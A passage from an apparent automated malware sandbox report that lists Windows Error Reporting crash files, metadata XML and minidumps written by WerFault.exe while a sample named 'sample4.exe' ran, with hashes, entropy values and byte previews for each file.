.t.A.p.p.V.e.r.=.2.0.2.0././.0.4././.0.7.:.1.0.:.4.4.:.1.6.!.0.!.s.a.m.p.l.e.4...

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sample4.exe_45365feab801c9585ad9627648598a0b3f59_b2de38ec_058db978\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	12080
Entropy (8bit):	3.7723760710787007
Encrypted:	false
SSDEEP:	96:YOIarJPFHQToA7Rb6tpXIQcQnc6rCcEhcw3r7+HbHg/PtuuzOOFLMbsWoxMfpNqy:6EJPbH56rQjzEfKXR/u7sWS274Itxp6
MD5:	8549CFB0ABB89E6BA07A896B3BAEB4FF
SHA1:	47BE65FFBEFFAB2884B681F321D4E329A339F28F
SHA-256:	36614A01566DE26BCAEC36177422C484B9ED2A5FAA8061A7D528680323D0346C
SHA-512:	B7B09418ACBE27182027B3FBAE153444AF2CB6FC5F39002D59546B583A4948A660FDC9F75D1802429071539830D0E4794E0473B06BD910DBAC300E72C67124A5
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.5.0.9.9.4.4.2.2.4.0.9.1.7.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.e.c.a.1.6.6.0.-.2.6.1.0.-.4.1.e.8.-.b.8.4.2.-.5.0.d.3.e.2.3.6.3.a.f.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.0.d.0.d.3.9.4.-.c.d.b.f.-.4.d.a.6.-.b.2.d.9.-.0.e.5.c.4.d.d.5.2.e.4.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.a.m.p.l.e.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.r.r.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.3.4.-.0.0.0.1.-.0.0.1.7.-.c.7.f.b.-.d.e.2.b.6.d.e.a.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.8.a.f.e.e.8.1.a.7.5.1.5.4.c.b.b.d.8.a.0.f.f.7.c.2.f.6.3.6.9.d.0.0.0.0.0.9.0.4.!.0.0.0.0.d.f.6.0.7.3.6.7.a.8.8.b.5.6.1.0.a.2.2.4.9.0.9.e.f.b.8.d.e.b.e.b.0.d.9.0.f.4.8.7.!.s.a.m.p.l.e.4...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.0.4././.0.7.:.1.0.:.4.4.:.1.6.!.0.!.s.a.m.p.l.e.4...

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sample4.exe_45365feab801c9585ad9627648598a0b3f59_b2de38ec_13ce361a\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	12384
Entropy (8bit):	3.775237108429829
Encrypted:	false
SSDEEP:	96:g9HQJPrHQToA7Rb6tpXIQcQnc6rCcEhcw3r7+HbHg/PtuuzOOFLMbsWoxMfpNqEY:PJP1H56rQjzEfKX0/u7sxS274Itxpv
MD5:	A83850FBB51EE9A273A439B5D0CEE57E
SHA1:	379A2AA130BF3AA164B9FF6C1E09508E4C21D122
SHA-256:	A66236E86CF2B98ABAC970EF37589CB14E684DF8AAF6928EF58D4C563EBB4F7E
SHA-512:	DA8583D262A7139EC32D20E9CDBAE2FC5F0A948F4889CCA9467286B5F5AABBF2E801D823767A3EF7F146AA4C62947842030DD25533F898DEFA163A1555E192E7
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.5.0.9.9.4.7.4.1.4.7.0.9.2.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.5.b.1.3.a.7.-.1.0.3.c.-.4.c.5.a.-.b.b.3.5.-.8.e.e.d.6.5.6.7.8.1.c.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.2.b.e.6.5.1.e.-.8.5.e.0.-.4.6.1.5.-.9.f.4.6.-.c.f.9.8.4.8.6.2.c.5.8.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.a.m.p.l.e.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.r.r.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.3.4.-.0.0.0.1.-.0.0.1.7.-.c.7.f.b.-.d.e.2.b.6.d.e.a.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.8.a.f.e.e.8.1.a.7.5.1.5.4.c.b.b.d.8.a.0.f.f.7.c.2.f.6.3.6.9.d.0.0.0.0.0.9.0.4.!.0.0.0.0.d.f.6.0.7.3.6.7.a.8.8.b.5.6.1.0.a.2.2.4.9.0.9.e.f.b.8.d.e.b.e.b.0.d.9.0.f.4.8.7.!.s.a.m.p.l.e.4...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.0.4././.0.7.:.1.0.:.4.4.:.1.6.!.0.!.s.a.m.p.l.e.4...

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sample4.exe_45365feab801c9585ad9627648598a0b3f59_b2de38ec_16da5cdc\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	13300
Entropy (8bit):	3.7692678717959778
Encrypted:	false
SSDEEP:	96:1q5DJPmHQToA7Rb6tpXIQcQnc6rCcEhcw3r7+HbHg/PtuuzOOFLMbsWoxMfpNqEg:iJPAH56rQjzEfKX1r/u7sxS274Itxpo
MD5:	39D1F56E6FF74B3E803A3DB436DC0567
SHA1:	D353F7D0519C76D8CA38ADA8DF241FC8186AF0F8
SHA-256:	ED3D8B5ED2B208991F4041604523D134C2939875FEB9DD22DA31FC5956FECF3C
SHA-512:	C7395B8FA4F20D0EA4BB8A686AE625BE3352EC6A42AF74A0DBD9AA0E475D2009B5CEE2AE9D725C989D4C16B58390C02F4AC4FD11D39972A2CB683A6F0B516226
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.5.0.9.9.4.8.2.6.1.5.8.5.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.6.8.4.b.1.f.-.b.5.a.a.-.4.0.5.d.-.a.c.b.b.-.8.a.d.9.c.6.c.4.f.1.e.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.d.c.4.b.4.d.0.-.2.5.0.d.-.4.4.b.5.-.a.8.4.3.-.0.e.5.9.1.7.e.2.2.0.1.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.a.m.p.l.e.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.r.r.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.3.4.-.0.0.0.1.-.0.0.1.7.-.c.7.f.b.-.d.e.2.b.6.d.e.a.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.8.a.f.e.e.8.1.a.7.5.1.5.4.c.b.b.d.8.a.0.f.f.7.c.2.f.6.3.6.9.d.0.0.0.0.0.9.0.4.!.0.0.0.0.d.f.6.0.7.3.6.7.a.8.8.b.5.6.1.0.a.2.2.4.9.0.9.e.f.b.8.d.e.b.e.b.0.d.9.0.f.4.8.7.!.s.a.m.p.l.e.4...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.0.4././.0.7.:.1.0.:.4.4.:.1.6.!.0.!.s.a.m.p.l.e.4...

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sample4.exe_45365feab801c9585ad9627648598a0b3f59_b2de38ec_177de25c\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	12082
Entropy (8bit):	3.773622159663461
Encrypted:	false
SSDEEP:	96:SzwJPCHQToA7Rb6tpXIQcQnc6rCcEhcw3r7+HbHg/PtuuzOOFLMbsWoxMfpNqE6T:uwJPEH56rQjzEfKXR/u7sWS274ItxpX
MD5:	F9DE8B024B8D805B8F53277DADEC61E5
SHA1:	EC6E575FD9A307A7263744CCE43F6050E08FFC83
SHA-256:	8F9EF602CEB6BBA4CDA441F993EFA97E087D84DADFB4D4D183E7FD0EC7B36E03
SHA-512:	05322EF2B9BFB4BC0F26FC17E255EEC6968D2AC59114E3AC08D63C7F8B516A7C7FCB32276F98136AB81B1ECF963FBA0EB97511802471E5235A6FAB03D8C7B80B
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.5.0.9.9.4.5.0.3.5.0.2.7.1.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.7.7.e.e.3.6.-.e.0.4.0.-.4.5.a.f.-.b.0.c.f.-.4.2.f.5.3.c.d.1.3.3.1.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.c.0.4.a.b.e.3.-.2.f.2.f.-.4.9.a.d.-.9.f.c.7.-.f.1.1.1.3.f.f.f.c.4.f.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.a.m.p.l.e.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.r.r.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.3.4.-.0.0.0.1.-.0.0.1.7.-.c.7.f.b.-.d.e.2.b.6.d.e.a.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.8.a.f.e.e.8.1.a.7.5.1.5.4.c.b.b.d.8.a.0.f.f.7.c.2.f.6.3.6.9.d.0.0.0.0.0.9.0.4.!.0.0.0.0.d.f.6.0.7.3.6.7.a.8.8.b.5.6.1.0.a.2.2.4.9.0.9.e.f.b.8.d.e.b.e.b.0.d.9.0.f.4.8.7.!.s.a.m.p.l.e.4...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.0.4././.0.7.:.1.0.:.4.4.:.1.6.!.0.!.s.a.m.p.l.e.4...

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1BD.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8400
Entropy (8bit):	3.6980603355241612
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNioq6I8J/6YSaSUGRPgmfGuSrCpBT89bGnqsfDxim:RrlsNit6I8R6YfSUGRPgmfGuSVGnJfp
MD5:	C5C4C37BAB140B7F7183F1EA1184CD0A
SHA1:	7E389311A6D7518BA8CE1D6FD27809934EA42140
SHA-256:	67AEC99C834D15887E74691AB6993FB14CBADD5A0482E332D3AA2B8FC331F759
SHA-512:	E2E7406119D4E6E7BDB497DC60BA97DA8F19BB1A85CD704EB7437788E98BD5F06C62FB06924387C1E74C32D9016263D10E87DDFCDDE16B1728B6CF2401D9D9DF
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.0.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER286E.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Jan 14 12:04:35 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	88980
Entropy (8bit):	2.000024614163454
Encrypted:	false
SSDEEP:	384:g7RA21BGylxzoEalrrZwyJPsVN1eIs6pkf7D13xqhaK7AT:glA2rGyXoEalrzPsP1eL9N40lT
MD5:	8CBBD4DF28ED24D275A5B99871F0AEE4
SHA1:	AC7743902178B19F482DF54F4D191E7EA41F41D5
SHA-256:	98E94389C6B85400A3F28EE1252AFEF8B3864112FF1B729541518A55D9D07601
SHA-512:	15935D5F2E9B3D88D74509ECEB017A12488C4ED823A8A010F0C0E801511340D02D9D86605DA13226C1342685C447BBE083BC348C10C5C3686BC210DFF5AF8E58
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......S3.`...................U...........B....... ......GenuineIntelW...........T.......4....2.`:............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER306E.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8400
Entropy (8bit):	3.6977100771396483
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNioP6IL76YSVSUr6gmfGuSrCpB889bFnqsfx3m:RrlsNiA6IL76YASUr6gmfGuSoFnJfM
MD5:	7BD3D3799E7832DB6E8F790D218F6198
SHA1:	DA33CD235E2F88038F7299C0D9A486547489823E
SHA-256:	E9740B916909FDF73EB25F1E70223088E17E80E6771BA1E586644542677406CB
SHA-512:	1B3C4D5DAE7287EF8A5E974D7FDE9D2CFAC70822F8E6A1CE1D80BF5E1E5288182EA325EA4C4716A8C52BD00198FE181D756CE4B86CB70E03C12E007913F77DD8
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.0.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER32EF.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4753
Entropy (8bit):	4.464512402648456
Encrypted:	false
SSDEEP:	48:cvIwSD8zskJgtWI97TWSC8Bd8fm8M4Jv6MFfAv+q8vc6ILJsGX7vXw3d:uITfigiSN8JSRvKPILJsGX7vXgd
MD5:	E826EDFB38864830ABE3759CDA64D964
SHA1:	E873E42E77CA0B011BF44A2616A814A94D78DD7D
SHA-256:	133CE84E255AE1177A340F2B6DCFEEEA66034B0DDAC5A6F12C9E968B4640EBBE
SHA-512:	9E95458200E71C52FEA724DD4A63A1FC5E17F556915044A22D833EACA03BC98BF4121F74F9BC3E0D6EF56D4512D0AEF7C629F0AD16682AAE75501F59AC890AD5
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="816315" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4983.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Jan 14 12:04:45 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	99634
Entropy (8bit):	1.9828576437490704
Encrypted:	false
SSDEEP:	384:DC3W2Ak9bpkazfErHylxzhIkv8lW0U3DSfeDZg1zH1IdYkyNXN9o+s0FHDP:DC3zAksasyXKkv8l96stjP
MD5:	B8D1A8E6D6C7382D9ED80DCE25C42A2F
SHA1:	D3872274171A35FE546DAE4A9ED22ACD9CFA59C2
SHA-256:	84214734DFEF4106844A48D535B124FE377C0D2F61C26DDE221FD9204DFF9EBA
SHA-512:	1515168F4EEF03BF1D87C022D90D54A2AB18A823E4E140CF1F51F9F1275DB7691D7DA5A6F4988F1390E1768554DDFDE6F167C9C5CC460375508C532A3ADE1E51
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......]3.`...................U...........B.......$......GenuineIntelW...........T.......4....2.`:............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4DB.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4753
Entropy (8bit):	4.463092547999117
Encrypted:	false
SSDEEP:	48:cvIwSD8zskJgtWI97TWSC8BM8fm8M4Jv6MF1+q8vc6ILJsGX7vXw3d:uITfigiSNrJSoKPILJsGX7vXgd
MD5:	E26E9D255F88D992E78511EDEA3FADF9
SHA1:	945EC689B90356703A4E19ECEBD57CA20262D43B
SHA-256:	CAE1AAC0E291E4AF14844FD194E2799CD81C7FFB27F3EB1050E1027519B60483
SHA-512:	22ED4E71392445AB7C3B9BEC66AA07A918270921199814676E984D9E96A79B7450D26B4894F4C1F8F5D3FC65D77E28C27524ACB82191BDCA20B514F0CD9E0247
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="816315" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER55D8.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8402
Entropy (8bit):	3.6978315130490094
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNioR6oW6YSpSU/RUgmfGuSrCpB689bSnqsfXGm:RrlsNiO6Z6YcSU/RUgmfGuSySnJff
MD5:	DB68D6E459836A75F1E0AF2DC6BAA85A
SHA1:	2CE8D49935A1B4FDCC481D03799836985BFCC0D9
SHA-256:	3CB838BDC9B4E336895C5973F459D35E405FEF9677F8D82200E5A92A3A68527E
SHA-512:	40F4D08F3E5531C2F636A079739673811A8E5020B5F9E73BF1222C9CCBB0DCF88B03E3BD2BF3F44E47D5D1631D10A20BE99F8CCCA64F0928CB25D1C92619E4D8
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.0.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER585A.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4753
Entropy (8bit):	4.461932434666514
Encrypted:	false
SSDEEP:	48:cvIwSD8zskJgtWI97TWSC8Bis8fm8M4Jv6MF5O+q8vc6ILJsGX7vXw3d:uITfigiSN8JSVKPILJsGX7vXgd
MD5:	A46FB23426B471BA03A31FDE8720D575
SHA1:	CED3DAA8CC74407B7A14EC4D6EF6C1BC349E9EB9
SHA-256:	7C28650FC1F5DEC46F21CB7B42172FBB7861CF305A9F46FF2E91CEB20F2D13BD
SHA-512:	42F8F054A5A32C667D48CABA88115A6C606F988B4910B8D9F9A5BF62996F13E3BE725A108FBE6982066577800FE559D185BC1FD2A4206B347698EA28ADF0539A
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="816315" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERABCC.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Jan 14 12:04:04 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	60446
Entropy (8bit):	1.9975649594048102
Encrypted:	false
SSDEEP:	192:E2XIa05AgbT3ylxzcBYxZrrab1v2cDuK8Sbq8tHYzTBljqcKyF9:1Ia05AozylxzOY3rWhph8qXEBIA
MD5:	3EDA680C46EC45A8E65D4DB4AC767333
SHA1:	CFF6ECFF168973FFD267A1649458A2F88B9B318B
SHA-256:	1D4A384AC3803A0FB281104685A46862C6E74409B70F261C7854878FC0143EEF
SHA-512:	0D96C97B790B83ABC1D5D1F7CF53DBFCDC41BE82CA8C713493B9593DB3C2E04800615E94E2C7F28E605E40C0DC0A33741C50CACFDF8FA32013629C07C8112A23
Malicious:	false
Preview:	MDMP....... .......43.`...................U...........B..............GenuineIntelW...........T.......4....2.`:............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

